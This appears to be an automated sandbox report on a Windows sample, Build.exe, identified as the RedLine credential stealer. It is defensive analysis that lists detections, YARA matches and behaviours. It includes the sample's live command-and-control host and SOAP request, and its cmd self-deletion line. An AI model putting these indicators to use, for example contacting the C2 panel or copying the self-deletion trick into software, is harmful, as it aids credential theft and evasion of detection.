Windows Analysis Report
Build.exe

Overview

General Information

Sample name: Build.exe
Analysis ID: 1464753
MD5: 19e47b9abf123f4502545a5fcb43c855
SHA1: c722baba8294f20abdb344b61d72d444a4171b62
SHA256: d3215483bba6219bb6587367aa3fa8c1737706497ed4befcb175649dc00e7be2
Tags: exe
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Self deletion via cmd or bat file
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Build.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Build.exe ReversingLabs: Detection: 78%
Source: Build.exe Virustotal: Detection: 74% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Build.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Build.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Build.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 6677
Yara detected Generic Downloader
Source: Yara match File source: Build.exe, type: SAMPLE
Source: Yara match File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 147.185.221.16:6677
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 147.185.221.16 147.185.221.16
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: medical-m.gl.at.ply.gg
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: unknown HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: Build.exe String found in binary or memory: http://checkip.amazonaws.com/)https://ipinfo.io/ip
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://medical-m.gl.at.ply.gg
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://medical-m.gl.at.ply.gg:6677
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://medical-m.gl.at.ply.gg:6677/IRemotePanel
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/0
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse05
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse05
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsT
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse05
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoLR
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse05
Source: Build.exe String found in binary or memory: https://api.ipify.org
Source: Build.exe String found in binary or memory: https://google.com/
Source: Build.exe String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Build.exe, type: SAMPLE Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Source: Build.exe, type: SAMPLE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_00CCDFE8 0_2_00CCDFE8
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_00CCD2B0 0_2_00CCD2B0
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C689C0 0_2_04C689C0
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C64B50 0_2_04C64B50
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C65611 0_2_04C65611
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C67028 0_2_04C67028
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C66FF6 0_2_04C66FF6
Sample file is different than original file name gathered from version info
Source: Build.exe, 00000000.00000002.1863379517.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Build.exe
Source: Build.exe, 00000000.00000000.1640202823.0000000000346000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe
Source: Build.exe Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe
Uses 32bit PE files
Source: Build.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: Build.exe, type: SAMPLE Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: Build.exe, type: SAMPLE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/0@2/1
Source: C:\Users\user\Desktop\Build.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03
Source: Build.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Build.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6356)
Source: C:\Users\user\Desktop\Build.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Build.exe ReversingLabs: Detection: 78%
Source: Build.exe Virustotal: Detection: 74%
Source: unknown Process created: C:\Users\user\Desktop\Build.exe "C:\Users\user\Desktop\Build.exe"
Source: C:\Users\user\Desktop\Build.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\Build.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: Build.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Build.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Build.exe, LoadExecutor.cs .Net Code: SelfExecute System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: Build.exe Static PE information: 0xC739A26A [Sun Dec 1 16:25:14 2075 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_00CCF450 push ecx; ret 0_2_00CCF6A2
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_00CCF650 push ecx; ret 0_2_00CCF6A2
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C6E389 pushfd ; retf 0004h 0_2_04C6E38A
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C6AF70 push cs; ret 0_2_04C6AFA4
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C6E868 pushfd ; retf 0004h 0_2_04C6E86A
Source: C:\Users\user\Desktop\Build.exe Code function: 0_2_04C6E818 pushfd ; retf 0004h 0_2_04C6E81A

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\Build.exe Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"
Source: C:\Users\user\Desktop\Build.exe Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 6677
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
